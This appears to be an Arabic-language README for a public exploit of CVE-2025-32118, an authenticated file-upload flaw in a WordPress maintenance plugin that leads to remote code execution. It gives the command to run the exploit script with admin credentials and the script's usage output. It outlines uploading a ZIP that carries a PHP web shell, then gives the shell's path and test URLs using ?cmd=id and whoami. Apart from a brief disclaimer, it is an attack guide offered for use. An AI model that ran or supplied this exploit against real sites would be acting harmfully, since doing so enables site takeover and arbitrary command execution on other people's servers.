
WordPress CMP – Coming Soon & Maintenance plugin <= 4.1.13 - ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE)
🔍 العنوان: إضافة CMP – Coming Soon & Maintenance لووردبريس <= 4.1.13 - تنفيذ كود عن بُعد (RCE)
🗓️ النشر: 2025-04-04
🔐 CWE: CWE-434 - رفع ملفات بدون تقييد بنوع خطير
📊 CVSS: 9.1 (حرج) — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
توجد ثغرة تنفيذ كود عن بُعد (RCE) حرجة في إضافة CMP – Coming Soon & Maintenance لووردبريس (<= 4.1.13).
يسمح هذا الخلل لمستخدم مدير موثوق (authenticated admin user) برفع ملفات ZIP ضارة تحتوي على قذائف PHP قابلة للتنفيذ، مما يؤدي إلى اختراق كامل للموقع.
<= 4.1.13)python3 CVE-2025-32118.py -u http://target-site.com/wordpress -un admin -p password
usage: CVE-2025-32118.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Base URL of WordPress site
-un, --username USERNAME Admin username
-p, --password PASSWORD Admin password
| الراية | الوصف |
|---|---|
-u | رابط قاعدة موقع ووردبريس |
-un | اسم المستخدم |
-p | كلمة المرور |
nonce صالح لطلب الرفع.style.css (تنسيق قالب صالح)nxploitedshell.php (حمولة RCE)?cmd=whoami.بمجرد الرفع بنجاح، ستكون القذيفة في:
/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php
اختبرها عبر:
http://target-site.com/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php?cmd=id
هذا الاستغلال لأغراض تعليمية فقط.
الاستخدام غير المصرح به لهذا الكود ضد أنظمة لا تملكها غير قانوني وغير أخلاقي.
Nxploited | Khaled Alenazi